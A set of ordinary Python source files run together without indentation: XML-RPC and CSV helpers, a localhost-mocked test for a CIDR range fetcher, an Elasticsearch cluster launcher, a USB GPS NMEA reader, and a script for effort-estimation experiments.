if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPSConnection(h, None,
**kwargs)
result = self._connection[1]
return result
class ServerProxy(xmlrpclib.ServerProxy):
def __init__(self, uri, **kwargs):
self.timeout = timeout = kwargs.pop('timeout', None)
# The above classes only come into play if a timeout
# is specified
if timeout is not None:
scheme, _ = splittype(uri)
use_datetime = kwargs.get('use_datetime', 0)
if scheme == 'https':
tcls = SafeTransport
else:
tcls = Transport
kwargs['transport'] = t = tcls(timeout, use_datetime=use_datetime)
self.transport = t
xmlrpclib.ServerProxy.__init__(self, uri, **kwargs)
#
# CSV functionality. This is provided because on 2.x, the csv module can't
# handle Unicode. However, we need to deal with Unicode in e.g. RECORD files.
#
def _csv_open(fn, mode, **kwargs):
if sys.version_info[0] < 3:
mode += 'b'
else:
kwargs['newline'] = ''
return open(fn, mode, **kwargs)
class CSVBase(object):
defaults = {
'delimiter': str(','), # The strs are used because we need native
'quotechar': str('"'), # str in the csv API (2.x won't take
'lineterminator': str('\n') # Unicode)
}
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.stream.close()
class CSVReader(CSVBase):
def __init__(self, **kwargs):
if 'stream' in kwargs:
stream = kwargs['stream']
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
self.stream = stream
else:
self.stream = _csv_open(kwargs['path'], 'r')
self.reader = csv.reader(self.stream, **self.defaults)
def __iter__(self):
return self
def next(self):
result = next(self.reader)
if sys.version_info[0] < 3:
for i, item in enumerate(result):
if not isinstance(item, text_type):
result[i] = item.decode('utf-8')
return result
__next__ = next
class CSVWriter(CSVBase):
def __init__(self, fn, **kwargs):
self.stream = _csv_open(fn, 'w')
self.writer = csv.writer(self.stream, **self.defaults)
def writerow(self, row):
if sys.version_info[0] < 3:
r = []
for item in row:
if isinstance(item, text_type):
item = item.encode('utf-8')
r.append(item)
row = r
self.writer.writerow(row)
#
# Configurator functionality
#
class Configurator(BaseConfigurator):
value_converters = dict(BaseConfigurator.value_converters)
value_converters['inc'] = 'inc_convert'
def __init__(self, config, base=None):
super(Configurator, self).__init__(config)
self.base = base or os.getcwd()
def configure_custom(self, config):
def convert(o):
if isinstance(o, (list, tuple)):
result = type(o)([convert(i) for i in o])
elif isinstance(o, dict):
if '()' in o:
result = self.configure_custom(o)
else:
result = {}
for k in o:
result[k] = convert(o[k])
else:
result = self.convert(o)
return result
c = config.pop('()')
if not callable(c):
c = self.resolve(c)
props = config.pop('.', None)
# Check for valid identifiers
args = config.pop('[]', ())
if args:
args = tuple([convert(o) for o in args])
items = [(k, convert(config[k])) for k in config if valid_ident(k)]
kwargs = dict(items)
result = c(*args, **kwargs)
if props:
for n, v in props.items():
setattr(result, n, convert(v))
return result
def __getitem__(self, key):
result = self.config[key]
if isinstance(result, dict) and '()' in result:
self.config[key] = result = self.configure_custom(result)
return result
def inc_convert(self, value):
"""Default converter for the inc:// protocol."""
if not os.path.isabs(value):
value = os.path.join(self.base, value)
with codecs.open(value, 'r', encoding='utf-8') as f:
result = json.load(f)
return result
#
# Mixin for running subprocesses and capturing their output
#
class SubprocessMixin(object):
def __init__(self, verbose=False, progress=None):
self.verbose = verbose
self.progress = progress
def reader(self, stream, context):
"""
Read lines from a subprocess' output stream and either pass to a progress
callable (if specified) or write progress information to sys.stderr.
"""
progress = self.progress
verbose = self.verbose
while True:
s = stream.readline()
if not s:
break
if progress is not None:
progress(s, context)
else:
if not verbose:
sys.stderr.write('.')
else:
sys.stderr.write(s.decode('utf-8'))
sys.stderr.flush()
stream.close()
def run_command(self, cmd, **kwargs):
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, **kwargs)
t1 = threading.Thread(target=self.reader, args=(p.stdout, 'stdout'))
t1.start()
t2 = threading.Thread(target=self.reader, args=(p.stderr, 'stderr'))
t2.start()
p.wait()
t1.join()
t2.join()
if self.progress is not None:
self.progress('done.', 'main')
elif self.verbose:
sys.stderr.write('done.\n')
return p
|
test_cidr.py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
import os
import socket
import sys
import threading
import unittest
# Third party
import requests
import cidr
def get_free_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(("localhost", 0))
address, port = s.getsockname()
s.close()
return port
# Global Variables
mock_server_port = get_free_port()
# Override Urls to use Mock Test Urls
cidr.IPRANGE_URLS = {
"goog": "http://localhost:{}/ipranges/goog.json".format(mock_server_port),
"cloud": "http://localhost:{}/ipranges/cloud.json".format(mock_server_port),
}
class MockServerRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(requests.codes.ok)
self.send_header("Content-type", "text/html")
self.end_headers()
if self.path.endswith("goog.json"):
fname = "samplefiles/goog.json"
with open(fname) as fp:
self.wfile.write(bytes(fp.read(), "utf-8"))
elif self.path.endswith("cloud.json"):
fname = "samplefiles/cloud.json"
with open(fname) as fp:
self.wfile.write(bytes(fp.read(), "utf-8"))
else:
mock_page = [
"<html>",
"<head><title>Mock Test</title></head>",
"<body>",
"<p>This is a test page.</p>",
"You accessed path: {}",
"</body>",
"</html>",
]
self.wfile.write(bytes("".join(mock_page).format(self.path), "utf-8"))
return
class BaseClass(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Configure mock server.
cls.mock_server_port = mock_server_port
cls.mock_server = HTTPServer(
("localhost", cls.mock_server_port), MockServerRequestHandler
)
cls.mock_server_thread = threading.Thread(target=cls.mock_server.serve_forever)
cls.mock_server_thread.setDaemon(True)
cls.mock_server_thread.start()
print("Running Server")
def setup_method(self, test_method):
"""To setup mock values for http requests"""
os.environ["BUILD_SPECIFIC_GCLOUD_PROJECT"] = "random"
class TestHttpRequests(BaseClass):
def test_request_response(self):
url = "http://localhost:{port}/HealthCheck".format(port=mock_server_port)
# Send a request to the mock API server and store the response.
response = requests.get(url)
# Confirm that the request-response cycle completed successfully.
self.assertTrue(
response.ok, msg="Failed to run test server! Install dev-requirements.txt"
)
def test_goog_url(self):
output = cidr.read_url(cidr.IPRANGE_URLS["goog"])
with open("samplefiles/goog.json") as fp:
expected_output = json.loads(fp.read())
self.assertEqual(
sorted(output.items()),
sorted(expected_output.items()),
msg="Url Data Mistmatch!",
)
def test_cloud_url(self):
output = cidr.read_url(cidr.IPRANGE_URLS["cloud"])
with open("samplefiles/cloud.json") as fp:
expected_output = json.loads(fp.read())
self.assertEqual(
sorted(output.items()),
sorted(expected_output.items()),
msg="Url Data Mistmatch!",
)
def test_main(self):
try:
import StringIO as io
except ModuleNotFoundError:
import io
capturedOutput = io.StringIO()
sys.stdout = capturedOutput
cidr.main()
sys.stdout = sys.__stdout__
current_output = capturedOutput.getvalue().strip()
with open("samplefiles/output.txt") as fp:
expected_output = fp.read().strip()
self.assertEqual(
set(expected_output) - set(current_output), set(), msg="Output Mistmatch!"
)
if __name__ == "__main__":
unittest.main()
|
cluster.py
|
"""
Higher-level abstraction to start elasticsearch using the elasticsearch binary.
Here's how you can use it:
import time
import threading
cluster = ElasticsearchCluster(7541)
def monitor():
cluster.wait_is_up()
print('elasticsearch is up!', cluster.health())
threading.Thread(target=monitor, daemon=True).start()
try:
cluster.start()
cluster.join()
except KeyboardInterrupt:
cluster.shutdown()
finally:
print('ok, bye')
"""
import logging
import os
from typing import Dict, List, NamedTuple, Optional
from urllib.parse import urlparse
import requests
from localstack import config, constants
from localstack.services import install
from localstack.services.generic_proxy import EndpointProxy
from localstack.services.infra import DEFAULT_BACKEND_HOST, start_proxy_for_service
from localstack.utils.common import (
ShellCommandThread,
chmod_r,
get_free_tcp_port,
is_root,
mkdir,
rm_rf,
)
from localstack.utils.run import FuncThread
from localstack.utils.serving import Server
LOG = logging.getLogger(__name__)
CommandSettings = Dict[str, str]
class Directories(NamedTuple):
install: str
tmp: str
mods: str
data: str
backup: str
def get_elasticsearch_health_status(url: str) -> Optional[str]:
"""
Queries the health endpoint of elasticsearch and returns either the status ('green', 'yellow',
...) or None if the response returned a non-200 response.
"""
resp = requests.get(url + "/_cluster/health")
if resp and resp.ok:
es_status = resp.json()
es_status = es_status["status"]
return es_status
return None
def resolve_directories(version: str, cluster_path: str, data_root: str = None) -> Directories:
"""
Determines directories to find the elasticsearch binary as well as where to store the instance data.
:param version: the elasticsearch version (to resolve the install dir)
:param cluster_path: the path between data_root and the actual data directories
:param data_root: the root of the data dir (will be resolved to TMP_PATH or DATA_DIR by default)
:returns: a Directories data structure
"""
# where to find elasticsearch binary and the modules
install_dir = install.get_elasticsearch_install_dir(version)
modules_dir = os.path.join(install_dir, "modules")
if data_root is None:
if config.dirs.data:
data_root = config.dirs.data
else:
data_root = config.dirs.tmp
data_path = os.path.join(data_root, "elasticsearch", cluster_path)
tmp_dir = os.path.join(data_path, "tmp")
data_dir = os.path.join(data_path, "data")
backup_dir = os.path.join(data_path, "backup")
return Directories(install_dir, tmp_dir, modules_dir, data_dir, backup_dir)
def init_directories(dirs: Directories):
"""
Makes sure the directories exist and have the necessary permissions.
"""
LOG.debug("initializing elasticsearch directories %s", dirs)
chmod_r(dirs.install, 0o777)
if not dirs.data.startswith(config.dirs.data):
# only clear previous data if it's not in DATA_DIR
rm_rf(dirs.data)
rm_rf(dirs.tmp)
mkdir(dirs.tmp)
chmod_r(dirs.tmp, 0o777)
mkdir(dirs.data)
chmod_r(dirs.data, 0o777)
mkdir(dirs.backup)
chmod_r(dirs.backup, 0o777)
# clear potentially existing lock files (which cause problems since ES 7.10)
for d, dirs, files in os.walk(dirs.data, True):
for f in files:
if f.endswith(".lock"):
rm_rf(os.path.join(d, f))
def build_elasticsearch_run_command(es_bin: str, settings: CommandSettings) -> List[str]:
cmd_settings = [f"-E {k}={v}" for k, v, in settings.items()]
return [es_bin] + cmd_settings
class ElasticsearchCluster(Server):
def __init__(
self, port=9200, host="localhost", version: str = None, directories: Directories = None
) -> None:
super().__init__(port, host)
self._version = version or constants.ELASTICSEARCH_DEFAULT_VERSION
self.command_settings = {}
self.directories = directories or self._resolve_directories()
@property
def version(self):
return self._version
def health(self):
return get_elasticsearch_health_status(self.url)
def do_start_thread(self) -> FuncThread:
# FIXME: if this fails the cluster could be left in a wonky state
# FIXME: this is not a good place to run install, and it only works because we're
# assuming that there will only ever be one running Elasticsearch cluster
install.install_elasticsearch(self.version)
self._init_directories()
cmd = self._create_run_command(additional_settings=self.command_settings)
cmd = " ".join(cmd)
user = constants.OS_USER_ELASTICSEARCH
if is_root() and user:
# run the elasticsearch process as a non-root user (when running in docker)
cmd = f"su {user} -c '{cmd}'"
env_vars = self._create_env_vars()
LOG.info("starting elasticsearch: %s with env %s", cmd, env_vars)
t = ShellCommandThread(
cmd,
env_vars=env_vars,
strip_color=True,
log_listener=self._log_listener,
)
t.start()
return t
def _log_listener(self, line, **_kwargs):
LOG.info(line.rstrip())
def _create_run_command(
self, additional_settings: Optional[CommandSettings] = None
) -> List[str]:
# delete Elasticsearch data that may be cached locally from a previous test run
dirs = self.directories
bin_path = os.path.join(dirs.install, "bin/elasticsearch")
# build command settings for bin/elasticsearch
settings = {
"http.port": self.port,
"http.publish_port": self.port,
"transport.port": "0",
"network.host": self.host,
"http.compression": "false",
"path.data": f'"{dirs.data}"',
"path.repo": f'"{dirs.backup}"',
}
if os.path.exists(os.path.join(dirs.mods, "x-pack-ml")):
settings["xpack.ml.enabled"] = "false"
if additional_settings:
settings.update(additional_settings)
self._settings_compatibility(settings)
cmd = build_elasticsearch_run_command(bin_path, settings)
return cmd
def _create_env_vars(self) -> Dict:
return {
"ES_JAVA_OPTS": os.environ.get("ES_JAVA_OPTS", "-Xms200m -Xmx600m"),
"ES_TMPDIR": self.directories.tmp,
}
def _settings_compatibility(self, settings):
# compatibility hacks for older versions
if int(self.version.split(".")[0]) <= 5:
settings["transport.tcp.port"] = settings["transport.port"]
del settings["transport.port"]
def _resolve_directories(self) -> Directories:
# by default, the cluster data will be placed in <data_dir>/elasticsearch/<version>/
return resolve_directories(version=self.version, cluster_path=self.version)
def _init_directories(self):
init_directories(self.directories)
class ProxiedElasticsearchCluster(Server):
"""
Starts an ElasticsearchCluster behind a localstack service proxy. The ElasticsearchCluster
backend will be assigned a random port.
"""
def __init__(
self, port=9200, host="localhost", version=None, directories: Directories = None
) -> None:
super().__init__(port, host)
self._version = version or constants.ELASTICSEARCH_DEFAULT_VERSION
self.cluster = None
self.cluster_port = None
self.directories = directories
@property
def version(self):
return self._version
def is_up(self):
# check service lifecycle
if not self.cluster:
return False
if not self.cluster.is_up():
return False
return super().is_up()
def health(self):
"""
calls the health endpoint of elasticsearch through the proxy, making sure implicitly that
both are running
"""
return get_elasticsearch_health_status(self.url)
def do_start_thread(self) -> FuncThread:
# start elasticsearch backend
if not self.cluster_port:
self.cluster_port = get_free_tcp_port()
self.cluster = ElasticsearchCluster(
port=self.cluster_port,
host=DEFAULT_BACKEND_HOST,
version=self.version,
directories=self.directories,
)
self.cluster.start()
self.cluster.wait_is_up()
LOG.info("elasticsearch cluster on %s is ready", self.cluster.url)
# start front-facing proxy
return start_proxy_for_service(
"elasticsearch",
self.port,
self.cluster_port,
update_listener=None,
quiet=True,
params={"protocol_version": "HTTP/1.0"},
)
def do_shutdown(self):
self.cluster.shutdown()
class CustomEndpoint:
enabled: bool
endpoint: str
def __init__(self, enabled: bool, endpoint: str) -> None:
self.enabled = enabled
self.endpoint = endpoint
if self.endpoint:
self.url = urlparse(endpoint)
else:
self.url = None
class EdgeProxiedElasticsearchCluster(Server):
"""
Elasticsearch-backed Server that can be routed through the edge proxy using an UrlMatchingForwarder to forward
requests to the backend cluster.
"""
def __init__(self, url: str, version=None, directories: Directories = None) -> None:
self._url = urlparse(url)
super().__init__(
host=self._url.hostname,
port=self._url.port,
)
self._version = version or constants.ELASTICSEARCH_DEFAULT_VERSION
self.cluster = None
self.cluster_port = None
self.proxy = None
self.directories = directories
@property
def version(self):
return self._version
@property
def url(self) -> str:
return self._url.geturl()
def is_up(self):
# check service lifecycle
if not self.cluster:
return False
if not self.cluster.is_up():
return False
return super().is_up()
def health(self):
"""
calls the health endpoint of elasticsearch through the proxy, making sure implicitly that
both are running
"""
return get_elasticsearch_health_status(self.url)
def do_run(self):
self.cluster_port = get_free_tcp_port()
self.cluster = ElasticsearchCluster(
port=self.cluster_port,
host=DEFAULT_BACKEND_HOST,
version=self.version,
directories=self.directories,
)
self.cluster.start()
self.proxy = EndpointProxy(self.url, self.cluster.url)
LOG.info("registering an endpoint proxy for %s => %s", self.url, self.cluster.url)
self.proxy.register()
self.cluster.wait_is_up()
LOG.info("elasticsearch cluster on %s is ready", self.cluster.url)
return self.cluster.join()
def do_shutdown(self):
if self.proxy:
self.proxy.unregister()
if self.cluster:
self.cluster.shutdown()
|
gps.py
|
"""Provides an interface to a USB GPS device."""
import utm
import time
import serial
import logging
import numpy as np
from threading import Thread
from datetime import datetime
import serial.tools.list_ports
logger = logging.getLogger(__name__)
class GPS():
"""GPS object."""
def __init__(self, comport=None, filename=None, baudrate=4800,
parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS):
"""Initialize."""
if comport is None:
comport = serial.tools.list_ports.comports()[0].device
self.serial_port = serial.Serial(comport, baudrate=baudrate,
parity=parity, stopbits=stopbits,
bytesize=bytesize)
self.filename = filename
self.timestamp = None
self.datestamp = None
self.lat = np.nan
self.lon = np.nan
self.alt = np.nan
self.utm_coords = None
self.running = True
self.acquired = False
self.thread = Thread(target=self._updater, daemon=True)
self.thread.start()
def _updater(self):
while self.running:
try:
ser_bytes = self.serial_port.readline()
decoded_bytes = ser_bytes.decode('utf-8')
if self.filename is not None and self.filename != '':
try:
with open(self.filename, 'a') as w:
w.write(decoded_bytes.strip() + '\n')
except FileNotFoundError:
logger.warning(f'Unable to find file {self.filename}'
+ ' Disabling GPS file stream.')
self.filename = None
# Exctract location information
data = decoded_bytes.split(",")
if 'GGA' in data[0]:
self._parse_gpgga(data)
if 'RMC' in data[0]:
self._parse_gprmc(data)
except UnicodeDecodeError:
time.sleep(1)
except serial.SerialException:
logger.warning('GPS disconnected!')
def _parse_gpgga(self, data):
try:
# Read timestamp
self.timestamp = datetime.strptime(data[1], '%H%M%S.%f').time()
# Read lat/lon info
lat_str = data[2]
lat_dir = data[3]
lon_str = data[4]
lon_dir = data[5]
# Convert to decimel degrees
if lat_str != '':
lat = float(lat_str[:2]) + float(lat_str[2:])/60
if lat_dir == 'S':
lat = -lat
self.lat = lat
if lon_str != '':
lon = float(lon_str[:3]) + float(lon_str[3:])/60
if lon_dir == 'W':
lon = -lon
self.lon = lon
# Unpack altitude
alt_str = data[9]
if alt_str != '':
alt = float(alt_str)
alt_unit = data[10]
# Convert from feet to meters if required
if alt_unit == 'F':
alt = 0.3048 * alt
self.alt = alt
# Convert to UTM units
try:
self.utm_coords = utm.from_latlon(lat, lon)
except UnboundLocalError:
pass
self.acquired = True
except ValueError as e:
logger.warn(f'Error parsing GPS string\n{e}')
def _parse_gprmc(self, data):
"""Parse NMEA GPRMC string."""
try:
# Read timestamp
self.timestamp = datetime.strptime(data[1], '%H%M%S.%f').time()
# Read date stamp
self.datestamp = datetime.strptime(data[9], '%d%m%y').date()
# Read lat/lon info
lat_str = data[3]
lat_dir = data[4]
lon_str = data[5]
lon_dir = data[6]
# Convert to decimel degrees
if lat_str != '':
lat = float(lat_str[:2]) + float(lat_str[2:])/60
if lat_dir == 'S':
lat = -lat
self.lat = lat
if lon_str != '':
lon = float(lon_str[:3]) + float(lon_str[3:])/60
if lon_dir == 'W':
lon = -lon
self.lon = lon
except ValueError as e:
logger.warn(f'Error parsing GPS string\n{e}')
def get_position(self, time_to_wait=60):
"""Report current time and position."""
t0 = datetime.now()
while (datetime.now() - t0).total_seconds() < time_to_wait:
flags = [~np.isnan(self.lat), ~np.isnan(self.lon),
self.timestamp is not None, self.datestamp is not None]
if np.array(flags).all():
return [datetime.combine(self.datestamp, self.timestamp),
self.lat, self.lon, self.alt]
logger.warning(f'No GPS fix acquired after {time_to_wait} seconds')
def close(self):
"""Close the connection."""
self.running = False
self.thread.join()
self.serial_port.close()
logger.info('GPS serial connection closed')
|
experiment.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2018, Jianfeng Chen <jchen37@ncsu.edu>, Tianpei Xia <txia4@ncsu.edu>
# vim: set ts=4 sts=4 sw=4 expandtab smartindent:
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import random
import sys
import time
import pdb
import os
from multiprocessing import Process
import numpy
from Main.methods import de_estimate, ga_estimate, random_strategy, nsga2_estimate, moead_estimate
from Main.methods import testing
from Optimizer.feature_link import calc_error1
from data.new_data import data_albrecht, data_desharnais, data_finnish, data_kemerer, data_maxwell, data_miyazaki, \
data_china, data_isbsg10, data_kitchenham
from utils.kfold import KFoldSplit_df
from sklearn.model_selection import train_test_split
from Main.cart import *
# from Optimizer.feature_link import mre_calc, msa
from Optimizer.errors import msa, mre
import numpy as np
import pandas as pd
f = lambda x: [ s[-1] for s in x.as_matrix()]
def DE2(AllSet, TrainSet, TestSet):
best_config, ngen = de_estimate(20, 2, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config, "gen": ngen}
def DE8(AllSet, TrainSet, TestSet):
best_config, ngen = de_estimate(20, 8, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config, "gen": ngen}
def RANDOM10(AllSet, TrainSet, TestSet):
best_config = random_strategy(10, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config}
def RANDOM30(AllSet, TrainSet, TestSet):
best_config = random_strategy(30, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config}
def ABE0(AllSet, TrainSet, TestSet):
best_config = [0, 0, 0, 0, 0, 0]
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config}
def DE30(AllSet, TrainSet, TestSet):
best_config, ngen = de_estimate(30, 250, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config, "gen": ngen}
def GA100(AllSet, TrainSet, TestSet):
best_config, ngen = ga_estimate(100, 250, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config, "gen": ngen}
def DE10(AllSet, TrainSet, TestSet):
best_config, ngen = de_estimate(10, 250, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config, "gen": ngen}
def NSGA2(AllSet, TrainSet, TestSet):
best_config, ngen = nsga2_estimate(NP=100, NGEN=250, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config, "gen": ngen}
def MOEAD(AllSet, TrainSet, TestSet):
best_config, ngen = moead_estimate(NP=4, NGEN=250, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config, "gen": ngen}
def ATLM():
pass
def CART0(dataset, Trainset, TestSet):
Y_predict, Y_actual = cart(Trainset, TestSet)
_mre, sa = mre(Y_predict, Y_actual, f(dataset)), msa(Y_predict, Y_actual, f(dataset))
# print("mre: {0}, sa: {1}".format(_mre,sa))
return {"mre": _mre, "sa": sa, "config": None, "gen": None}
def CART_DE2(dataset, Trainset, TestSet):
learner = Cart
goal = "MRE"
train_X, train_Y= data_format(Trainset)
new_train_X, tune_X, new_train_Y, tune_Y = train_test_split(train_X, train_Y, test_size=0.3, shuffle=True)
test_X, Y_actual = data_format(TestSet)
params, evaluation = tune_learner(learner, new_train_X, new_train_Y,
tune_X, tune_Y, goal, num_population=20,repeats=2,life=20)
clf = learner(train_X, train_Y, test_X, Y_actual, goal).learner.set_params(**params)
clf.fit(train_X, train_Y)
Y_predict = clf.predict(test_X)
_mre, sa = mre(Y_predict, Y_actual, f(dataset)), msa(Y_predict, Y_actual, f(dataset))
# print("mre: {0}, sa: {1}".format(_mre,sa))
return {"mre": _mre, "sa": sa, "config": None, "gen": None, "params":params}
def CART_DE8(dataset, Trainset, TestSet):
learner = Cart
goal = "MRE"
train_X, train_Y= data_format(Trainset)
new_train_X, tune_X, new_train_Y, tune_Y = train_test_split(train_X, train_Y, test_size=0.3, shuffle=True)
test_X, Y_actual = data_format(TestSet)
params, evaluation = tune_learner(learner, new_train_X, new_train_Y, tune_X, tune_Y, goal, num_population=20, repeats=8,life=20)
clf = learner(train_X, train_Y, test_X, Y_actual, goal).learner.set_params(**params)
clf.fit(train_X, train_Y)
Y_predict = clf.predict(test_X)
_mre, sa = mre(Y_predict, Y_actual, f(dataset)), msa(Y_predict, Y_actual, f(dataset))
# print("mre: {0}, sa: {1}".format(_mre,sa))
params["actual_depth"] = clf.tree_.max_depth
return {"mre": _mre, "sa": sa, "config": None, "gen": None, "params":params}
def CART_DE10(dataset, Trainset, TestSet):
learner = Cart
goal = "MRE"
train_X, train_Y= data_format(Trainset)
new_train_X, tune_X, new_train_Y, tune_Y = train_test_split(train_X, train_Y, test_size=0.3, shuffle=True)
test_X, Y_actual = data_format(TestSet)
params, evaluation = tune_learner(learner, new_train_X, new_train_Y, tune_X, tune_Y, goal, num_population=10,repeats=250,life=5)
clf = learner(train_X, train_Y, test_X, Y_actual, goal).learner.set_params(**params)
clf.fit(train_X, train_Y)
Y_predict = clf.predict(test_X)
_mre, sa = mre(Y_predict, Y_actual, f(dataset)), msa(Y_predict, Y_actual, f(dataset))
# print("mre: {0}, sa: {1}".format(_mre,sa))
return {"mre": _mre, "sa": sa, "config": None, "gen": None}
def CART_DE30(dataset, Trainset, TestSet):
learner = Cart
goal = "MRE"
train_X, train_Y= data_format(Trainset)
new_train_X, tune_X, new_train_Y, tune_Y = train_test_split(train_X, train_Y, test_size=0.3, shuffle=True)
test_X, Y_actual = data_format(TestSet)
params, evaluation = tune_learner(learner, new_train_X, new_train_Y, tune_X, tune_Y, goal,num_population=30,repeats=250,life=5)
clf = learner(train_X, train_Y, test_X, Y_actual, goal).learner.set_params(**params)
clf.fit(train_X, train_Y)
Y_predict = clf.predict(test_X)
_mre, sa = mre(Y_predict, Y_actual, f(dataset)), msa(Y_predict, Y_actual, f(dataset))
# print("mre: {0}, sa: {1}".format(_mre,sa))
return {"mre": _mre, "sa": sa, "config": None, "gen": None}
def get_best_param(stats, this_best):
"""
:param stats: stats of one specific data set
:param this_best: current best parameters for one DE tuning
:return:
"""
for key, val in this_best.items():
stats[key] = stats.get(key,[]) + [val]
return stats
def exec(modelIndex, methodologyId, save_params=True):
"""
:param modelIndex:
:param methodologyId:
:return: writing to final_list.txt
^^^^ repeatID mre sa
"""
numpy.random.seed()
datafunc = [data_albrecht, data_desharnais, data_finnish, data_kemerer, data_maxwell, data_miyazaki,
data_china, data_isbsg10, data_kitchenham]
model = datafunc[modelIndex]
res = None
num_pj = len(model())
if num_pj < 40:
fold_num = 3
else:
fold_num = 10
# temp = {}
stats = {}
data_name = datafunc[modelIndex].__name__.split("_")[1]
for train, test in KFoldSplit_df(model(), fold_num):
if methodologyId == 0:
res = ABE0(model(), train, test)
if methodologyId == 2:
res = CART0(model(), train, test)
elif methodologyId == 4:
res = MOEAD(model(), train, test)
elif methodologyId == 5:
res = DE30(model(), train, test)
elif methodologyId == 6:
res = GA100(model(), train, test)
elif methodologyId == 7:
res = DE10(model(), train, test)
elif methodologyId == 8:
res = NSGA2(model(), train, test)
elif methodologyId == 9:
res = RANDOM10(model(), train, test)
elif methodologyId == 10:
res = RANDOM30(model(), train, test)
elif methodologyId == 11:
res = DE2(model(), train, test)
elif methodologyId == 12:
res = DE8(model(), train, test)
elif methodologyId == 13:
res = CART_DE2(model(), train, test)
elif methodologyId == 14:
res = CART_DE8(model(), train, test)
elif methodologyId == 15:
res = CART_DE10(model(), train, test)
elif methodologyId == 16:
res = CART_DE30(model(), train, test)
time.sleep(random.random() * 2) # avoid writing conflicts
stats[data_name] = get_best_param(stats.get(data_name,{}), res["params"])
if methodologyId == 0 or methodologyId == 9 or methodologyId == 10:
with open('final_list.txt', 'a+') as f:
# print("Finishing " + str(sys.argv))
f.write(
str(modelIndex) + ';' + str(methodologyId) + ';' + str(res["mre"]) + ';' + str(res["sa"]) + ';' +
str(res["config"]) + ';' + '\n')
elif methodologyId in [2, 13, 14, 15, 16]:
with open('final_Cart_DE.txt','a+') as f:
f.write(
str(modelIndex) + ';' + str(methodologyId) + ';' + str(res["mre"]) + ';' + str(res["sa"]) + ';' + '\n')
else:
with open('final_list.txt', 'a+') as f:
f.write(
str(modelIndex) + ';' + str(methodologyId) + ';' + str(res["mre"]) + ';' + str(res["sa"]) + ';' +
str(res["config"]) + ';' + str(res["gen"]) + '\n')
df = pd.DataFrame.from_dict(stats[data_name])
if save_params:
name = data_name+str(methodologyId)+".csv"
if os.path.exists(name):
with open(name, "a") as f:
df.to_csv(f, header=False, index=False)
else:
with open(name, "a") as f:
df.to_csv(f, header=True, index=False)
def run():
"""
system arguments:
1 modelIndex [0-albrecht, 1-desharnais, 2-finnish, 3-kemerer, 4-maxwell, 5-miyazaki, 6-china, 7-isbsg10, 8-kitchenham]
2 methodology ID [0-ABE0, 1-ATLM, 2-CART0, 3-CoGEE, 4-MOEAD, 5-DE30, 6-GA100,
7-DE10, 8-NSGA2, 9-RD10, 10-RD30, 11-DE2, 12-DE8, 13-CART_DE2,
14-CART_DE8, 15-CART_DE10,16-CART_DE30]
3 core Num, or the repeat times
:return:
"""
start_time = time.time()
if len(sys.argv) > 1:
modelIndex, methodologyId, repeatNum = int(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3])
else: # for default local run
modelIndex, methodologyId, repeatNum = 0, 0, 1
if repeatNum == 1:
time2 = time.time()
exec(modelIndex, methodologyId)
print("total time = " + str(time.time() - time2))
sys.exit(0)
time1 = time.time()
p = list()
for i in range(repeatNum):
p.append(Process(target=exec, args=(modelIndex, methodologyId)))
p[-1].start()
for i in range(repeatNum):
p[i].join()
print("total time = " + str(time.time() - time1))
print("--- %s seconds ---" % (time.time() - start_time))
